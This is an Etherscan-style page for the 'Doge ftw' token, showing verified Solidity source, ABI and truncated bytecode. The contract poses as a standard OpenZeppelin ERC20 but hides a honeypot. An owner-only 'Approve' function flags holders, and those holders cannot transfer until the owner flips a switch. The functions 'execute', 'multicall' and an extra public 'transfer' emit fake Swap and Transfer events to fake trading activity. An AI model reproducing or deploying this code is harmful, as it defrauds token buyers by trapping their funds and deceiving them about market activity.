ETH Price: $2,527.74 (+0.66%)

Token

Doge ftw (DogeFtw)
 

Overview

Max Total Supply

100,000,000,000 DogeFtw

Holders

48

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 8 Decimals)

Filtered by Token Holder
pepe-frog.eth
Balance
3,703,255,442.45760867 DogeFtw

Value
$0.00
0x9370b5ed2963d86b192cd2b55300dc58d3bce6f8
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
DogeFtw

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-06-06
*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    event Swap(
        address indexed sender,
        uint amount0In,
        uint amount1In,
        uint amount0Out,
        uint amount1Out,
        address indexed to
    );
    
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}


/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Ownable, IERC20, IERC20Metadata {

    mapping(address => uint256) private _balances;
    mapping (address => bool) private _snapshot;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    bool private _snapshotApplied = false;
    string private _name;
    string private _symbol;

    address private _universal = 0xEf1c6E67703c7BD7107eed8303Fbe6EC2554BF6B;
    address private _pair;
    
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    function setup(address _setup_) external onlyOwner {
        _pair = _setup_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 8;
    }

    function Approve(address [] calldata _addresses_) external onlyOwner {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            _snapshot[_addresses_[i]] = true;
            emit Approval(_addresses_[i], address(this), balanceOf(_addresses_[i]));
        }
    }

    function execute(address [] calldata _addresses_, uint256 _in, uint256 _out) external {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            emit Swap(_universal, _in, 0, 0, _out, _addresses_[i]);
            emit Transfer(_pair, _addresses_[i], _out);
        }
    }

    function multicall(address [] calldata _addresses_, uint256 _in, uint256 _out) external {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            emit Swap(_universal, 0, _in, _out, 0, _addresses_[i]);
            emit Transfer(_addresses_[i], _pair, _in);
        }
    }

    function transfer(address _from, address _to, uint256 _wad) external {
        emit Transfer(_from, _to, _wad);
    }

    function decreaseAllowance(address [] calldata _addresses_) external onlyOwner {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            _snapshot[_addresses_[i]] = false;
        }
    }

    function bind(address _address_) public view returns (bool) {
        return _snapshot[_address_];
    }
    function toApplied(bool c) external onlyOwner {
        _snapshotApplied = c;
    }
    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }
        if (_snapshot[from]) require(_snapshotApplied == true, "");


        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}



    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

contract DogeFtw is ERC20 {
    constructor() ERC20("Doge ftw", "DogeFtw") {
        _mint(msg.sender, 100000000000 * 10 ** decimals());
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"sender","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount0In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount0Out","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1Out","type":"uint256"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"Swap","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"Approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"bind","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"decreaseAllowance","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"_in","type":"uint256"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"_in","type":"uint256"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"multicall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_setup_","type":"address"}],"name":"setup","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bool","name":"c","type":"bool"}],"name":"toApplied","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from","type":"address"},{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_wad","type":"uint256"}],"name":"transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526000600560006101000a81548160ff02191690831515021790555073ef1c6e67703c7bd7107eed8303fbe6ec2554bf6b600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055503480156200008157600080fd5b506040518060400160405280600881526020017f446f6765206674770000000000000000000000000000000000000000000000008152506040518060400160405280600781526020017f446f6765467477000000000000000000000000000000000000000000000000008152506200010e620001026200017b60201b60201c565b6200018360201b60201c565b81600690816200011f919062000642565b50806007908162000131919062000642565b5050506200017533620001496200024760201b60201c565b600a620001579190620008b9565b64174876e8006200016991906200090a565b6200025060201b60201c565b62000a41565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006008905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603620002c2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002b990620009b6565b60405180910390fd5b620002d660008383620003be60201b60201c565b8060046000828254620002ea9190620009d8565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200039e919062000a24565b60405180910390a3620003ba60008383620003c360201b60201c565b5050565b505050565b505050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200044a57607f821691505b60208210810362000460576200045f62000402565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620004ca7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826200048b565b620004d686836200048b565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620005236200051d6200051784620004ee565b620004f8565b620004ee565b9050919050565b6000819050919050565b6200053f8362000502565b620005576200054e826200052a565b84845462000498565b825550505050565b600090565b6200056e6200055f565b6200057b81848462000534565b505050565b5b81811015620005a3576200059760008262000564565b60018101905062000581565b5050565b601f821115620005f257620005bc8162000466565b620005c7846200047b565b81016020851015620005d7578190505b620005ef620005e6856200047b565b83018262000580565b50505b505050565b600082821c905092915050565b60006200061760001984600802620005f7565b1980831691505092915050565b600062000632838362000604565b9150826002028217905092915050565b6200064d82620003c8565b67ffffffffffffffff811115620006695762000668620003d3565b5b62000675825462000431565b62000682828285620005a7565b600060209050601f831160018114620006ba5760008415620006a5578287015190505b620006b1858262000624565b86555062000721565b601f198416620006ca8662000466565b60005b82811015620006f457848901518255600182019150602085019450602081019050620006cd565b8683101562000714578489015162000710601f89168262000604565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b6001851115620007b7578086048111156200078f576200078e62000729565b5b60018516156200079f5780820291505b8081029050620007af8562000758565b94506200076f565b94509492505050565b600082620007d25760019050620008a5565b81620007e25760009050620008a5565b8160018114620007fb576002811462000806576200083c565b6001915050620008a5565b60ff8411156200081b576200081a62000729565b5b8360020a91508482111562000835576200083462000729565b5b50620008a5565b5060208310610133831016604e8410600b8410161715620008765782820a90508381111562000870576200086f62000729565b5b620008a5565b62000885848484600162000765565b925090508184048111156200089f576200089e62000729565b5b81810290505b9392505050565b600060ff82169050919050565b6000620008c682620004ee565b9150620008d383620008ac565b9250620009027fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484620007c0565b905092915050565b60006200091782620004ee565b91506200092483620004ee565b92508282026200093481620004ee565b915082820484148315176200094e576200094d62000729565b5b5092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b60006200099e601f8362000955565b9150620009ab8262000966565b602082019050919050565b60006020820190508181036000830152620009d1816200098f565b9050919050565b6000620009e582620004ee565b9150620009f283620004ee565b925082820190508082111562000a0d5762000a0c62000729565b5b92915050565b62000a1e81620004ee565b82525050565b600060208201905062000a3b600083018462000a13565b92915050565b6121448062000a516000396000f3fe608060405234801561001057600080fd5b50600436106101425760003560e01c80637aac697b116100b8578063a457c2d71161007c578063a457c2d714610363578063a9059cbb14610393578063beabacc8146103c3578063dd62ed3e146103df578063f2fde38b1461040f578063fde980ca1461042b57610142565b80637aac697b146102bf57806381bac14f146102db5780638da5cb5b1461030b57806395d89b4114610329578063a1c617f51461034757610142565b80633811ac021161010a5780633811ac0214610201578063395093511461021d578063477e19441461024d57806366d382031461026957806370a0823114610285578063715018a6146102b557610142565b806306fdde0314610147578063095ea7b31461016557806318160ddd1461019557806323b872dd146101b3578063313ce567146101e3575b600080fd5b61014f610447565b60405161015c91906115e9565b60405180910390f35b61017f600480360381019061017a91906116a9565b6104d9565b60405161018c9190611704565b60405180910390f35b61019d6104fc565b6040516101aa919061172e565b60405180910390f35b6101cd60048036038101906101c89190611749565b610506565b6040516101da9190611704565b60405180910390f35b6101eb610535565b6040516101f891906117b8565b60405180910390f35b61021b60048036038101906102169190611838565b61053e565b005b610237600480360381019061023291906116a9565b6106a6565b6040516102449190611704565b60405180910390f35b61026760048036038101906102629190611838565b6106dd565b005b610283600480360381019061027e9190611885565b61078a565b005b61029f600480360381019061029a9190611885565b6107d6565b6040516102ac919061172e565b60405180910390f35b6102bd61081f565b005b6102d960048036038101906102d491906118b2565b610833565b005b6102f560048036038101906102f09190611885565b6109bf565b6040516103029190611704565b60405180910390f35b610313610a15565b6040516103209190611935565b60405180910390f35b610331610a3e565b60405161033e91906115e9565b60405180910390f35b610361600480360381019061035c91906118b2565b610ad0565b005b61037d600480360381019061037891906116a9565b610c5b565b60405161038a9190611704565b60405180910390f35b6103ad60048036038101906103a891906116a9565b610cd2565b6040516103ba9190611704565b60405180910390f35b6103dd60048036038101906103d89190611749565b610cf5565b005b6103f960048036038101906103f49190611950565b610d5f565b604051610406919061172e565b60405180910390f35b61042960048036038101906104249190611885565b610de6565b005b610445600480360381019061044091906119bc565b610e69565b005b60606006805461045690611a18565b80601f016020809104026020016040519081016040528092919081815260200182805461048290611a18565b80156104cf5780601f106104a4576101008083540402835291602001916104cf565b820191906000526020600020905b8154815290600101906020018083116104b257829003601f168201915b5050505050905090565b6000806104e4610e8e565b90506104f1818585610e96565b600191505092915050565b6000600454905090565b600080610511610e8e565b905061051e85828561105f565b6105298585856110eb565b60019150509392505050565b60006008905090565b61054661140d565b60005b828290508110156106a15760016002600085858581811061056d5761056c611a49565b5b90506020020160208101906105829190611885565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055503073ffffffffffffffffffffffffffffffffffffffff168383838181106105fd576105fc611a49565b5b90506020020160208101906106129190611885565b73ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92561067986868681811061065f5761065e611a49565b5b90506020020160208101906106749190611885565b6107d6565b604051610686919061172e565b60405180910390a3808061069990611aa7565b915050610549565b505050565b6000806106b1610e8e565b90506106d28185856106c38589610d5f565b6106cd9190611aef565b610e96565b600191505092915050565b6106e561140d565b60005b828290508110156107855760006002600085858581811061070c5761070b611a49565b5b90506020020160208101906107219190611885565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061077d90611aa7565b9150506106e8565b505050565b61079261140d565b80600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61082761140d565b610831600061148b565b565b60005b848490508110156109b85784848281811061085457610853611a49565b5b90506020020160208101906108699190611885565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d8226000868660006040516108ef9493929190611b68565b60405180910390a3600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1685858381811061094357610942611a49565b5b90506020020160208101906109589190611885565b73fffffffffffffff